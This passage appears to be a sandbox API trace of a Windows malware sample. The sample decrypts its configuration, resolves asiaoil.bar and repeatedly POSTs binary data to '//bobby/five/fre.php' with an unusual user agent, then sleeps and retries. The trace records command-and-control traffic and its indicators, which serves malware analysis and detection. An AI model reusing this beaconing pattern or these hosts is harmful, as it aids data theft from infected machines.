out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0316.060] GetProcessHeap () returned 0x740000 [0316.060] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0316.060] GetProcessHeap () returned 0x740000 [0316.060] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0316.060] GetProcessHeap () returned 0x740000 [0316.060] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763938 [0316.061] GetProcessHeap () returned 0x740000 [0316.061] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0316.061] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0316.062] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0316.062] GetProcessHeap () returned 0x740000 [0316.062] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0316.062] GetProcessHeap () returned 0x740000 [0316.063] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0316.063] send (s=0x31c, buf=0x747928*, len=243, flags=0) returned 243 [0316.063] send (s=0x31c, buf=0x761fd0*, len=159, flags=0) returned 159 [0316.063] GetProcessHeap () returned 0x740000 [0316.063] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0316.063] recv (in: s=0x31c, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 571 [0316.187] GetProcessHeap () returned 0x740000 [0316.187] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0316.187] GetProcessHeap () returned 0x740000 [0316.188] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763938 | out: hHeap=0x740000) returned 1 [0316.188] GetProcessHeap () returned 0x740000 [0316.188] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0316.188] GetProcessHeap () returned 0x740000 [0316.188] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cee0 | out: hHeap=0x740000) returned 1 [0316.188] closesocket (s=0x31c) returned 0 [0316.189] GetProcessHeap () returned 0x740000 [0316.189] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b610 | out: hHeap=0x740000) returned 1 [0316.189] GetProcessHeap () returned 0x740000 [0316.189] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765898 | out: hHeap=0x740000) returned 1 [0316.189] GetProcessHeap () returned 0x740000 [0316.190] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763b30 | out: hHeap=0x740000) returned 1 [0316.190] GetProcessHeap () returned 0x740000 [0316.190] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0316.190] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xa04) returned 0x31c [0316.192] Sleep (dwMilliseconds=0xea60) [0316.194] GetProcessHeap () returned 0x740000 [0316.194] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763ed8 [0316.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.195] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0316.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.209] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d7e8) returned 1 [0316.217] GetProcessHeap () returned 0x740000 [0316.217] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0316.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.218] CryptImportKey (in: hProv=0x75d7e8, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0316.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.218] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0316.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.219] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.219] GetProcessHeap () returned 0x740000 [0316.220] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0316.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.221] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763ed8, pdwDataLen=0x19fcfc | out: pbData=0x763ed8, pdwDataLen=0x19fcfc) returned 1 [0316.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.222] CryptDestroyKey (hKey=0x74d368) returned 1 [0316.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.223] CryptReleaseContext (hProv=0x75d7e8, dwFlags=0x0) returned 1 [0316.223] GetProcessHeap () returned 0x740000 [0316.223] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765f10 [0316.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.224] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0316.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.225] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0316.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.226] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0316.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.227] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0316.227] GetProcessHeap () returned 0x740000 [0316.227] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c020 [0316.227] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0316.227] GetProcessHeap () returned 0x740000 [0316.227] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c020 | out: hHeap=0x740000) returned 1 [0316.227] GetProcessHeap () returned 0x740000 [0316.228] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765f10 | out: hHeap=0x740000) returned 1 [0316.228] GetProcessHeap () returned 0x740000 [0316.228] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763ed8 | out: hHeap=0x740000) returned 1 [0316.228] GetProcessHeap () returned 0x740000 [0316.228] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763f20 [0316.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.229] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0316.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.259] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d540) returned 1 [0316.265] GetProcessHeap () returned 0x740000 [0316.265] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0316.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.266] CryptImportKey (in: hProv=0x75d540, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0316.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.267] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0316.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.268] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.268] GetProcessHeap () returned 0x740000 [0316.268] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0316.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.269] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763f20, pdwDataLen=0x19fcfc | out: pbData=0x763f20, pdwDataLen=0x19fcfc) returned 1 [0316.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.270] CryptDestroyKey (hKey=0x74d368) returned 1 [0316.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.271] CryptReleaseContext (hProv=0x75d540, dwFlags=0x0) returned 1 [0316.271] GetProcessHeap () returned 0x740000 [0316.271] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765ce8 [0316.272] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.272] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0316.273] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.273] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0316.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.274] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0316.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.275] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0316.275] GetProcessHeap () returned 0x740000 [0316.275] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf58 [0316.275] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c208*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0316.277] GetProcessHeap () returned 0x740000 [0316.277] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b4f0 [0316.277] socket (af=2, type=1, protocol=6) returned 0x320 [0316.277] connect (s=0x320, name=0x75c208*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0316.298] FreeAddrInfoW (pAddrInfo=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c208*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0316.298] GetProcessHeap () returned 0x740000 [0316.298] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d7e8 [0316.298] GetProcessHeap () returned 0x740000 [0316.298] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0316.299] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0316.300] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0316.300] GetProcessHeap () returned 0x740000 [0316.300] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0316.300] GetProcessHeap () returned 0x740000 [0316.301] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0316.301] GetProcessHeap () returned 0x740000 [0316.301] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763740 [0316.301] GetProcessHeap () returned 0x740000 [0316.301] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0316.302] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0316.302] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0316.302] GetProcessHeap () returned 0x740000 [0316.302] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0316.302] GetProcessHeap () returned 0x740000 [0316.303] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0316.304] send (s=0x320, buf=0x747928*, len=243, flags=0) returned 243 [0316.304] send (s=0x320, buf=0x761fd0*, len=159, flags=0) returned 159 [0316.306] GetProcessHeap () returned 0x740000 [0316.306] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0316.306] recv (in: s=0x320, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 561 [0316.578] GetProcessHeap () returned 0x740000 [0316.578] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0316.578] GetProcessHeap () returned 0x740000 [0316.579] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763740 | out: hHeap=0x740000) returned 1 [0316.579] GetProcessHeap () returned 0x740000 [0316.579] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0316.579] GetProcessHeap () returned 0x740000 [0316.579] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d7e8 | out: hHeap=0x740000) returned 1 [0316.579] closesocket (s=0x320) returned 0 [0316.580] GetProcessHeap () returned 0x740000 [0316.580] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4f0 | out: hHeap=0x740000) returned 1 [0316.580] GetProcessHeap () returned 0x740000 [0316.580] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765ce8 | out: hHeap=0x740000) returned 1 [0316.580] GetProcessHeap () returned 0x740000 [0316.581] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763f20 | out: hHeap=0x740000) returned 1 [0316.581] GetProcessHeap () returned 0x740000 [0316.581] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf58 | out: hHeap=0x740000) returned 1 [0316.581] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1148) returned 0x320 [0316.583] Sleep (dwMilliseconds=0xea60) [0316.585] GetProcessHeap () returned 0x740000 [0316.585] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763860 [0316.585] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.586] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0316.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.593] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d298) returned 1 [0316.602] GetProcessHeap () returned 0x740000 [0316.602] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0316.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.604] CryptImportKey (in: hProv=0x75d298, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0316.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.605] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0316.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.658] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.659] GetProcessHeap () returned 0x740000 [0316.659] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0316.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.660] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763860, pdwDataLen=0x19fcfc | out: pbData=0x763860, pdwDataLen=0x19fcfc) returned 1 [0316.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.662] CryptDestroyKey (hKey=0x74d768) returned 1 [0316.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.663] CryptReleaseContext (hProv=0x75d298, dwFlags=0x0) returned 1 [0316.663] GetProcessHeap () returned 0x740000 [0316.663] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x7669d8 [0316.664] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.664] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0316.665] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.665] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0316.666] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.666] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0316.667] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.667] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0316.667] GetProcessHeap () returned 0x740000 [0316.667] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bfa8 [0316.667] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0316.668] GetProcessHeap () returned 0x740000 [0316.668] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bfa8 | out: hHeap=0x740000) returned 1 [0316.669] GetProcessHeap () returned 0x740000 [0316.669] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7669d8 | out: hHeap=0x740000) returned 1 [0316.669] GetProcessHeap () returned 0x740000 [0316.669] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763860 | out: hHeap=0x740000) returned 1 [0316.670] GetProcessHeap () returned 0x740000 [0316.670] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763f20 [0316.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.671] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0316.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.680] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cc38) returned 1 [0316.688] GetProcessHeap () returned 0x740000 [0316.688] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0316.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.690] CryptImportKey (in: hProv=0x75cc38, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0316.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.691] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0316.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.692] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.692] GetProcessHeap () returned 0x740000 [0316.693] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0316.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.694] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763f20, pdwDataLen=0x19fcfc | out: pbData=0x763f20, pdwDataLen=0x19fcfc) returned 1 [0316.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.695] CryptDestroyKey (hKey=0x74d368) returned 1 [0316.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.696] CryptReleaseContext (hProv=0x75cc38, dwFlags=0x0) returned 1 [0316.696] GetProcessHeap () returned 0x740000 [0316.696] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765670 [0316.696] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.697] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0316.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.761] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0316.762] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.762] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0316.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.763] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0316.763] GetProcessHeap () returned 0x740000 [0316.763] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0316.764] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bf80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2e0*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0316.765] GetProcessHeap () returned 0x740000 [0316.765] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b600 [0316.765] socket (af=2, type=1, protocol=6) returned 0x324 [0316.766] connect (s=0x324, name=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0316.792] FreeAddrInfoW (pAddrInfo=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bf80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2e0*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0316.792] GetProcessHeap () returned 0x740000 [0316.792] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cf68 [0316.792] GetProcessHeap () returned 0x740000 [0316.792] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0316.793] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0316.795] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0316.795] GetProcessHeap () returned 0x740000 [0316.795] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0316.795] GetProcessHeap () returned 0x740000 [0316.795] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0316.796] GetProcessHeap () returned 0x740000 [0316.796] RtlAllocateHeap (HeapHandle=0x740000, 